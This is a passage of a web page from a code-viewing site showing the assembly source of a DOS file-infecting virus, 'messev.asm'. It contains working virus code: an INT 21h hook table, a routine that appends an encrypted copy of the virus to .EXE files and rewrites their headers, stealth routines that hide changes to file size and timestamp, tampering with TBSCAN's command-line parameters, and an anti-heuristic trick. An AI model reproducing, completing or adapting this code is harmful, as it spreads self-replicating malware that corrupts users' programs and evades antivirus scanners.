📄 messev.asm
字号:
MOV AX, 3D02h ; Open file r/w.
CALL DosInt
JC Abort_Clean
XCHG BX, AX
CALL Clean_Handle ; Clean it.
MOV AH, 3Eh ; Close file.
CALL DosInt
Abort_Clean:
CALL Pop_All
JMP Continue
; Removes the virus physically from disk, before a program writes to it.
Clean_By_Handle:
CALL Clean_Handle
JMP Continue
; Cleans the handle, (must have read/write access).
Clean_Handle:
CALL Push_All
CALL Hook_i24h
PUSH CS
POP DS
CALL Check_Handle ; Filehandle?
JNZ No_Del
MOV AX, 5700h ; Get filedate.
CALL DosInt
MOV FileTime, CX ; Save it.
MOV FileDate, DX
AND CL, 00011111b ; Mask seconds.
CMP CL, 00011110b ; 60 seconds ?
JNE No_Del
CALL Save_File_Pos
CALL Go_End_File
SUB AX, 24
SBB DX, 0
MOV CX, DX
XCHG DX, AX
MOV AX, 4200h ; Pos. old header.
CALL DosInt
MOV AH, 3Fh ; Read old header.
MOV CX, 24
MOV DX, OFFSET Header
CALL DosInt
CALL Go_End_File
SUB AX, (Virus_Size + 16 + 24)
SBB DX, 0
MOV CX, DX
XCHG DX, AX
MOV AX, 4200h ;
CALL DosInt
MOV AH, 40h ; Write <EOF> marker.
XOR CX, CX
CALL DosInt
CALL Go_Begin_File
MOV AH, 40h ; Write old header.
MOV CX, 24
MOV DX, OFFSET Header
CALL DosInt
MOV AX, 5701h ; Set clean filedate.
MOV CX, FileTime
MOV DX, FileDate
AND CL, 11100000b ; Clear seconds.
CALL DosInt
CALL Restore_File_Pos
No_Del: CALL Unhook_i24h
CALL Pop_All
RETN
; Check if timestamp is marked as 'infected'.
; BX = Filehandle.
; ZF set when infected.
Check_Stamp:
PUSH AX
PUSH CX
PUSH DX
MOV AX, 5700h ; Get time & datestamp.
CALL DosInt
AND CL, 00011111b ; Infected?
CMP CL, 00011110b ; (Set's flags).
POP DX
POP CX
POP AX
RETN
; Hides infected timestamp.
Stealth_Time:
CALL DosInt
PUSHF
PUSH CX
MOV CS:Temp, CL
JC No_Stealth_Time
TEST CS:Status, 00000010b
JZ No_Stealth_Time
CALL Check_Stamp
JNZ No_Stealth_Time
AND CS:Temp, 11100000b ; Zero seconds.
No_Stealth_Time:
POP CX
POPF
MOV CL, CS:Temp
RETF 2
Save_File_Pos:
MOV AX, 4201h ; Get file-position.
XOR CX, CX
CWD
CALL DosInt
MOV CS:Old_Pos, DX
MOV CS:Old_Pos+2, AX
RETN
Restore_File_Pos:
MOV AX, 4200h
MOV CX, CS:Old_Pos
MOV DX, CS:Old_Pos+2
CALL DosInt
RETN
Go_Begin_File:
MOV AX, 4200h
XOR CX, CX
CWD
CALL DosInt
RETN
;-------------------------
; Goes to end of file.
;
; In: BX = filehandle
; Out: DX:AX = filesize
;-------------------------
Go_End_File:
MOV AX, 4202h
XOR CX, CX
CWD
CALL DosInt
RETN
; These INT 21h functions will be trapped by our virus. If the subfunction
; is 0FFh, it will be treaded like a wildcard.
Functions:
DW 11FFh ; Findfirst (FCB).
DW Stealth_Filesize_FCB
DW 12FFh ; Findnext (FCB).
DW Stealth_Filesize_FCB
DW 4EFFh ; Findfirst (handle).
DW Stealth_Filesize
DW 4FFFh ; Findnext (handle).
DW Stealth_Filesize
DW 4B00h ; Execute file.
DW Init_Exec
DW 4B01h ; Load but not execute.
DW Clean_By_File
DW 5700h ; Get filetime.
DW Stealth_Time
DW 3CFFh ; Create/truncate file.
DW Check_Infect
DW 3DFFh ; Open file.
DW Check_Infect
DW 3FFFh ; Read file (handle).
DW Stealth_File_Read
DW 40FFh ; Write to file (handle).
DW Clean_By_Handle
DW 42FFh ; lseek file.
DW Stealth_Fileseek
DW 41FFh ; Delete file.
DW Check_Infect
DW 4CFFh ; Program terminate.
DW Switch_Stealth_On
DW 6CFFh ; Extended open/create.
DW Check_Infect
DW 43FFh ; Get file-attributes.
DW Check_Infect
DW Residency_Check ; Are-You-There call.
DW Return_Call
DW 0 ; End table.
NewInt21h:
PUSH SI
PUSH BX
MOV SI, OFFSET Functions
Next_Function:
MOV BX, CS:[SI]
OR BH, BH ; End of table reached?
JZ End_Table_Reached ; Then abort.
CMP BH, AH ; Function match?
JNE Another
CMP BL, 0FFh ; Don't compare subfunction?
JE Exec_Function ; Then JMP to routine.
CMP BL, AL ; Subfunction right?
JE Exec_Function ; Then JMP to routine.
Another:
ADD SI, 4 ; Next entry.
JMP Next_Function ; Repeat loop.
End_Table_Reached:
POP BX
POP SI
Continue: JMP DWORD PTR CS:Int21h
Exec_Function:
MOV BX, CS:[SI+2]
MOV CS:Ret_Add, BX
POP BX
POP SI
JMP CS:Ret_Add ; JMP to routine.
; === Let the virus know that we are already installed in memory. ===
Return_Call:
MOV AX, Marker_Mem
IRET
Switch_Stealth_On:
PUSH AX
MOV AL, CS:Init_Status
MOV CS:Status, AL
POP AX
JMP Continue
Init_Exec:
CALL Push_All
; Should we be inactive during run of program?
; Else causes problems.
; ARJ.EXE Timestamp incorrect.
; PKZIP.EXE Wrong filesizes, etc.
MOV SI, DX
MOV DI, OFFSET No_Active
MOV CX, (OFFSET End_No_Active - OFFSET No_Active) / 7
CALL Search_Table
JNZ No_Disable
AND CS:Status, 00000000b
No_Disable:
MOV DI, OFFSET TBSCAN ; Add parameters to TBSCAN?
MOV CX, 1
CALL Search_Table
JNZ Not_TbScan
MOV DI, ES:[BX+2]
MOV ES, ES:[BX+4]
MOV AL, ES:[DI]
CBW
ADD BYTE PTR ES:[DI], 6 ; Length parameters.
INC DI
ADD DI, AX
PUSH CS
POP DS
CLD
MOV SI, OFFSET Parameters
MOVSW
MOVSW
MOVSW
MOVSB
Not_TbScan:
CALL Pop_All
; === INFECTION ROUTINE ===
Check_Infect:
CALL Push_All
CALL Hook_i24h ; Dummy error-handler.
CMP AH, 6Ch ; Extended open/create?
JNE No_Ext_Open ; (used by F-Prot).
MOV DX, SI ; DX = SI.
No_Ext_Open:
TEST CS:Status, 00000001b ; Infect-mode on?
JZ JMP_Exit_i21h ; Abort when not.
MOV AX, 3D02h ; Open file for r/w.
CALL DosInt
JNC No_Open_Error
JMP_Exit_i21h: JMP Exit_Int_21h
DB 'Daddy-K-tit 2 Gallyon van Vessem'
No_Open_Error:
XCHG BX, AX ; BX = Handle.
CALL Check_Handle ; Filehandle?
JNZ Abort_Check
PUSH CS
POP DS
PUSH CS
POP ES
MOV AH, 3Fh ; Read header.
MOV CX, 24
MOV DX, OFFSET Header
CALL DosInt
JC Abort_Check ; If we can't read.
CALL Go_End_File
OR DX, DX ; > 64k?
JNZ Over_64k
CMP AX, 560 ; File too small?
JB Abort_Check
Over_64k:
CMP Mark, 'ZM' ; .EXE-file?
JNE Abort_Check ; Exit when not.
CMP Checksum, Marker_File ; Already infected?
JNE Infect_File
Abort_Check:
JMP Close_File
Infect_File:
MOV AX, 5700h ; Get filetime.
CALL DosInt
PUSH CX
PUSH DX
CALL Go_End_File
AND AX, 00001111b ; Filelength MOD 16.
MOV Padding, AX
OR AX, AX
JZ No_Padding
MOV AH, 40h ; Write padding bytes.
MOV CX, 16
SUB CL, AL
MOV Padding, CX
CALL DosInt
No_Padding:
CALL Go_End_File
PUSH DX ; Size host + padding.
PUSH AX
CLD ; Save old CS:IP.
MOV SI, OFFSET Init_IP
MOV DI, OFFSET Old_Entry
MOVSW
MOVSW
MOV AX, Init_SP ; Save old SS:SP.
MOV Old_Stack, AX
MOV AX, Init_SS
MOV Old_Stack+2, AX
IN AL, 40h ; Get random encryption-key.
MOV File_Key, AL
CLD ; Copy virus to buffer
XOR SI, SI ; for encryption.
MOV DI, OFFSET Buffer
MOV CX, Virus_Size
REP MOVSB
MOV SI, OFFSET Buffer
MOV CX, OFFSET End_Encrypted_File
Encrypt_Byte:
XOR BYTE PTR [SI], AL ; Encrypt ourself in buffer.
INC SI
LOOP Encrypt_Byte
MOV AH, 40h ; Append virus to host.
MOV CX, (Virus_Size + 16)
SUB CX, Padding
MOV DX, OFFSET Buffer
CALL DosInt
MOV AH, 40h ; Write original header
MOV CX, 24 ; to end of hostfile.
MOV DX, OFFSET Header
CALL DosInt
MOV AX, HeaderSize ; Calculate headersize.
MOV CX, 16
MUL CX
XCHG CX, AX
POP AX ; Length host + padding.
POP DX
SUB AX, CX ; Minus headersize.
SBB DX, 0 ; *** Causes a bug with ARJ
; by small files. > 512.
; Also with Invircible.
MOV CX, 16 ; In paragraphs.
DIV CX
MOV Init_CS, AX ; Store new CS.
MOV Init_IP, OFFSET START
DEC AX ; Anti-heuristic.
MOV Init_SS, AX
MOV Init_SP, (Virus_Mem_Size * 16)
CALL Go_End_File
MOV CX, 16 ; Filelength in paragraphs.
DIV CX
ADD AX, Virus_Mem_Size
MOV MinMem, AX
CALL Go_End_File
MOV CX, 512 ; 512 byte-pages.
DIV CX
OR DX, DX ; No rest?
JZ No_Round ; Then no round-off.
INC AX ; Round off.
No_Round: MOV Byte_Pages, AX
MOV MOD512, DX
MOV Checksum, Marker_File ; Mark as infected.
CALL Go_Begin_File
MOV AH, 40h ; Write updated header.
MOV CX, 24
MOV DX, OFFSET Header
CALL DosInt
MOV AX, 5701h ; Restore filedate.
POP DX
POP CX
AND CL, 11100000b ; Clear seconds.
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -